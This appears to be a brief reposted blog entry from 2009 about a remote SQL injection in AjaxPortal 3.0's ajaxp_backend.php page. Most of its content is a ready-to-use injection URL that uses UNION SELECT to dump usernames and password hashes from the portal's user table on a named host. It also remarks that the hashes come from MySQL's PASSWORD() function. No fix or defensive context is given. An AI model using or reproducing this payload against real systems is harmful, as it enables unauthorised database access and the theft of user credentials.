MySQL Security

AjaxPortal 3.0 (ajaxp_backend.php page) Remote SQL Injection …

Posted on 02. Apr, 2009 by admin in MySQL

… http://calmpc.net/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+dbPfixajaxp_users– Passwords are encoded using MySQL PASSWORD() function. (used algorithm depends on MySQL version.

Originally posted here:
AjaxPortal 3.0 (ajaxp_backend.php page) Remote SQL Injection …

Tags: MySQL, network, network security, passwords, used-algorithm